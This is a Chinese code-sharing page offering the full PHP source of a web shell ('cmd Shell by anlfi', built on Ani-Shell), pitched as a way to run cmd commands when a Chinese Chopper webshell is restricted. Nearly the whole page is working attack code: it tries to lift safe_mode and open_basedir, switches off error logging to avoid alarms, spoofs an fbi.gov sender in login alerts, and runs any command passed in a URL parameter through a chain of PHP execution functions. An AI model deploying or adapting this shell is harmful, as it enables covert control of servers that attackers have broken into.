首页 > 代码库 > 当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令
当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令
<?php/*==============*/error_reporting(0);ini_set(‘max_execution_time‘,0);// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\/**************** Defines *********************************/$user = "anlfi";$pass = "XXX";$sm = @ini_get(‘safe_mode‘);$SEPARATOR = ‘/‘; // Default Directory separator$os = "N/D";if(stristr(php_uname(),"Windows")){ $SEPARATOR = ‘\\‘; $os = "Windows";}else if(stristr(php_uname(),"Linux")){ $os = "Linux";}//*************************************************************/// -------------- Traceback Functionsfunction sendLoginAlert(){ global $ownerEmail; global $url; $accesedIp = $_SERVER[‘REMOTE_ADDR‘]; $randomInt = rand(0,1000000); # to avoid id blocking $from = "ani-shell$[email]randomInt@fbi.gov[/email]"; //echo $from; if(function_exists(‘mail‘)) { $subject = "Shell Accessed -- Ani-Shell --"; $message = "Hey Owner , Your Shell(Ani-Shell) located at $url was accessed by $accesedIp If its not you :- 1. Please check if the shell is secured. 2. Change your user name and Password. 3. Check if lock is 0n! and Kick that ****** out! Thanking You Yours FaithfullyAni-Shell "; mail($ownerEmail,$subject,$message,‘From:‘.$from); }}//---------------------------------------------------------if(function_exists(‘session_start‘) && $lock == ‘on‘){ session_start();}else{ // The lock will be set to ‘off‘ if the session_start fuction is disabled i.e if sessions are not supported $lock = ‘off‘;}//logoutif(isset($_GET[‘logout‘]) && $lock == ‘on‘){ $_SESSION[‘authenticated‘] = 0; session_destroy(); header("location: ".$_SERVER[‘PHP_SELF‘]);}ini_set(‘max_execution_time‘,0);/***************** Restoring *******************************/ini_restore("safe_mode");ini_restore("open_basedir");if(function_exists(‘ini_set‘)){ ini_set(‘error_log‘,NULL); // No alarming logs ini_set(‘log_errors‘,0); // No logging of errors}else{ ini_alter(‘error_log‘,NULL); ini_alter(‘log_errors‘,0);}// ----------------------------------------------------------------------------------------------------------------?><html><head><title>cmd Shell by:anlfi</title><style>/*========================== CSS Section==========================*/*{ padding:0; margin:0;}.alert{ background:red; color:white; font-weight:bold;}td.info{ width:0px;}.bind { border: 1px solid #333333; margin: 15px auto 0; font-size: small;}div.end *{ font-size:small;}div.end { width:100%; background:#222;}p.blink{ text-decoration: blink;}body { background-color:black; color:rgb(35,182,39); font-family:Tahoma,Verdana,Arial; font-size: small;}input.own { background-color: Green; color: white; border : 1px solid #ccc;}blockquote.small{ font-size: smaller; color: silver; text-align: center;}table.files{ border-spacing: 10px; font-size: small;}h1 { padding: 4px; padding-bottom: 0px; margin-right : 5px;}div.logo{ border-right: 1px aqua solid;}div.header{ padding-left: 5px; font-size: small; text-align: left;}div.nav{ margin-top:1px; height:30px; background-color: #ccc;}div.nav ul{ list-style: none; padding: 4px;}div.nav li{ float: left; margin-right: 10px; text-align:center;}textarea.cmd{ border : 1px solid #111; background-color : green; font-family: Shell; color : white; margin-top: 10px; font-size:small;}input.cmd{ background-color:black; color: white; width: 400px; border : 1px solid #ccc;}td.maintext{ font-size: large;}#margins{ margin-left: 10px; margin-top: 10px; color:white;}table.top{ border-bottom: 1px solid aqua; width: 100%;}#borders{ border-top : 1px solid aqua; border-left:1px solid aqua; border-bottom: 1px solid aqua; border-right: 1px solid aqua; margin-bottom:0;}td.file a , .file a{ color : aqua; text-decoration:none;}a.dir{ color:white; font-weight:bold; text-decoration:none;}td.dir a{ color : white; text-decoration:none;}td.download,td.download2{ color:green;}#spacing{ padding:10px; margin-left:200px;}th.header{ background: none repeat scroll 0 0 #191919; color: white; border-bottom : 1px solid #333333;}p.warning{ background : red; color: white;}//--------------------------------CSS END------------------------------------------------------*/</style></head><body text="rgb(39,245,10)" bgcolor="black"><?phpif(isset($_POST[‘user‘]) && isset($_POST[‘pass‘]) && $lock == ‘on‘){ if( $_POST[‘user‘] == $user && $_POST[‘pass‘] == $pass ) { $_SESSION[‘authenticated‘] = 1; // --------------------- Tracebacks -------------------------------- if($tracebackFeature == ‘On‘) { sendLoginAlert(); } // ------------------------------------------------------------------ }}if($lock == ‘off‘){?> <p class="warning"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></p><?php}if($lock == ‘on‘ && (!isset($_SESSION[‘authenticated‘]) || $_SESSION[‘authenticated‘]!=1) ){?><table> <tbody> <tr> <td width="500px"> <pre><font color="Orange"><b>[]--------------cmd Shell-----------------</b></pre> </td> <td> <!-- <h1><?php // echo $greeting;?></h1> <img src="http://www.mamicode.com/Logo_03.png" class="imageForm" /> --> <form method="POST" action="<?php echo $_SERVER[‘PHP_SELF‘];?>"> <input name="user" value="http://www.mamicode.com/Username"/> <input name="pass" type="" value=""/> <input class="own" type="Submit" value="http://www.mamicode.com/in!"/> </form> </td> </tr> </tbody></table><?php}//---------------------------------- We are authenticated now-------------------------------------//Launch the shellelse { //---------------------------------- Fuctions --------------------------------------------------- function showDrives() { global $self; foreach(range(‘A‘,‘Z‘) as $drive) { if(is_dir($drive.‘:\\‘)) { ?> <a class="dir" href=http://www.mamicode.com/‘<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>‘> <?php echo $drive.":\\" ?> </a> <?php } } } function HumanReadableFilesize($size) { $mod = 1024; $units = explode(‘ ‘,‘B KB MB GB TB PB‘); for ($i = 0; $size > $mod; $i++) { $size /= $mod; } return round($size, 2) . ‘ ‘ . $units[$i]; }function getClientIp(){ echo $_SERVER[‘REMOTE_ADDR‘];}function getServerIp(){ echo getenv(‘SERVER_ADDR‘);}function getSoftwareInfo(){ echo php_uname();}function diskSpace(){ echo HumanReadableFilesize(disk_total_space("/"));}function freeSpace(){ echo HumanReadableFilesize(disk_free_space("/"));}function getSafeMode(){ global $sm; echo($sm?"ON :( :‘( (Most of the Features will Not Work!)":"OFF"); }function getDisabledFunctions(){ if(!ini_get(‘disable_functions‘)) { echo "None"; } else { echo @ini_get(‘disable_functions‘); }}function getFilePermissions($file){ $perms = fileperms($file);if (($perms & 0xC000) == 0xC000) { // Socket $info = ‘s‘;} elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = ‘l‘;} elseif (($perms & 0x8000) == 0x8000) { // Regular $info = ‘-‘;} elseif (($perms & 0x6000) == 0x6000) { // Block special $info = ‘b‘;} elseif (($perms & 0x4000) == 0x4000) { // Directory $info = ‘d‘;} elseif (($perms & 0x2000) == 0x2000) { // Character special $info = ‘c‘;} elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = ‘p‘;} else { // Unknown $info = ‘u‘;}// Owner$info .= (($perms & 0x0100) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0080) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? ‘s‘ : ‘x‘ ) : (($perms & 0x0800) ? ‘S‘ : ‘-‘));// Group$info .= (($perms & 0x0020) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0010) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? ‘s‘ : ‘x‘ ) : (($perms & 0x0400) ? ‘S‘ : ‘-‘));// World$info .= (($perms & 0x0004) ? ‘r‘ : ‘-‘);$info .= (($perms & 0x0002) ? ‘w‘ : ‘-‘);$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? ‘t‘ : ‘x‘ ) : (($perms & 0x0200) ? ‘T‘ : ‘-‘));return $info;}/***********************************************************/// exec_all , A function used to execute commands , This function will only execute if the Safe Mode is// Turned OfF!/**********************************************************/function exec_all($command){ $output = ‘‘; if(function_exists(‘exec‘)) { exec($command,$output); $output = join("\n",$output); } else if(function_exists(‘shell_exec‘)) { $output = shell_exec($command); } else if(function_exists(‘popen‘)) { $handle = popen($command , "r"); // Open the command pipe for reading if(is_resource($handle)) { if(function_exists(‘fread‘) && function_exists(‘feof‘)) { while(!feof($handle)) { $output .= fread($handle, 512); } } else if(function_exists(‘fgets‘) && function_exists(‘feof‘)) { while(!feof($handle)) { $output .= fgets($handle,512); } } } pclose($handle); } else if(function_exists(‘system‘)) { ob_start(); //start output buffering system($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists(‘passthru‘)) { ob_start(); //start output buffering passthru($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists(‘proc_open‘)) { $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to ); $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array ‘pipes‘ if(is_resource($handle)) { if(function_exists(‘fread‘) && function_exists(‘feof‘)) { while(!feof($pipes[1])) { $output .= fread($pipes[1], 512); } } else if(function_exists(‘fgets‘) && function_exists(‘feof‘)) { while(!feof($pipes[1])) { $output .= fgets($pipes[1],512); } } } pclose($handle); } else { $output = "They have their Security there! :( "; } return(htmlspecialchars($output)); }function magicQuote($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text);}//------------------------------------------------------------------------------------------------?></div><div class="nav"><ul> <li><a href="http://www.mamicode.com/<?php echo $self.‘?shell‘;?>">Shell</a></li> <?php if($lock == ‘on‘) { ?> <li><a href="http://www.mamicode.com/<?php echo $self.‘?logout‘?>">I m Out!</a></li> <?php } ?></ul></div>/////////by:Anlfi//////////<?php//-------------------------------- Check what he wants -------------------------------------------// Shellif(isset($_GET[‘shell‘])){ if(!isset($_GET[‘cmd‘]) || $_GET[‘cmd‘] == ‘‘) { $result = ""; } else { $result=exec_all($_GET[‘cmd‘]); } ?> <textarea class="cmd" cols="100" rows="20"><?php echo $result;?></textarea> <form action="<?php echo $self;?>" method="GET"> <!-- For Shell --> <input name="shell" type="hidden" /> <!-- For CMD --> <input name="cmd" class="cmd" /> <input name="submit" value="http://www.mamicode.com/Run!" class="own" type="submit" /> </form> <?php }}?>
菜刀下默认执行效果
此脚本测试效果
当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。